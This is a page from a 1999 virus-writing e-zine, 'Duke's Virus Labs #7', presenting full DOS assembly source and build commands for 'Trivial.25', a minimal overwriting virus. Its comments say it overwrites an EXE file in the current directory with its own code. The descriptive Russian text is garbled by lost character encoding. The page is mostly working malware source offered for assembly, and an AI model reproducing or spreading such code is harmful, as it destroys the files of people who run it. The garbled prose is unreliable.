- [Duke's Virus Labs #7] - [Page 26] -

Trivial.25
(c) by Duke/SMF

     : Trivial.25
         : Duke/SMF
 ண.   : TASM
 ᮧ : 11.07.99
 AV    :   ;)

    ⨢ 쮭 ⮪  ᠭ  ࠩ.   
筮 來  . ,   ... ;0

===== Cut here =====
; Trivial.25 (c) by Duke/SMF
; ᫨  ⥪饬 ⠫  EXE-䠩 (, ᫨  ),
;  १襬 . ᠭ  ⮯   Companion.38 .
; tasm tr_25.asm /m
; tlink tr_25.obj /t

       .model tiny
       .code
       org  100h
start:
maska  db   '*.e*'
       mov  ah,4eh       ; 饬
       call new
new:
       mov  dx,si
       int  21h

       mov  ax,3D01h     ; 뢠
       mov  dx,9eh
       int  21h

       xchg bx,ax
       mov  ah,40h       ; 襬
       ret

end start
===== Cut here =====
